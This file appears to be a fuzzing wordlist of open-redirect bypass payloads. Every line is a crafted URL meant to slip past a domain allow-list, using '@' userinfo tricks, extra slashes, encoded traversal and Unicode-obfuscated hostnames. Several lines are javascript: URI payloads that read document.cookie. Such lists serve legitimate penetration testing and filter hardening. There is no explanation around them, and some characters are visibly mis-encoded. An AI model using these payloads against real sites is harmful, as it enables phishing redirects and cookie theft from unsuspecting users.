www.whitelisteddomain.tld;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.whitelisteddomain.tldï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
////www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
//www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
////www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////www.whitelisteddomain.tld@localdomain.pw/%2f..
///www.whitelisteddomain.tld@localdomain.pw/%2f..
//www.whitelisteddomain.tld@localdomain.pw/%2f..
////www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
//www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
//www.whitelisteddomain.tldâº&@localdomain.pw#âº@www.whitelisteddomain.tld/
//www.whitelisteddomain.tld+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@www.whitelisteddomain.tld/
//www.whitelisteddomain.tldâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@www.whitelisteddomain.tld/
//www.whitelisteddomain.tldï½¡â‚¨/
////www.whitelisteddomain.tld@www.google.com/%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
x00http://google.com
/x:1/:///%01javascript:alert(document.cookie)/
/x:1/:///%01javascript:alert(document.cookie)/?
\x20http://google.com
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\205pZM@example.com+@google.com/
//XY>.7d8T\205pZM@example.com@google.com/
//XY>.7d8T\205pZM@traidnt.net+@bing.com/
//XY>.7d8T\205pZM@traidnt.net@bing.com/
//XY>.7d8T\205pZM@whitelisted.com+@google.com/?
//XY>.7d8T\205pZM@whitelisted.com@google.com/?
//XY>.7d8T\205pZM@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/?
//XY>.7d8T\205pZM@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/?
//XY>.7d8T\205pZM@WillBeReplaced.com+@google.com/
//XY>.7d8T\205pZM@WillBeReplaced.com@google.com/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tldâº@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@www.whitelisteddomain.tldâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
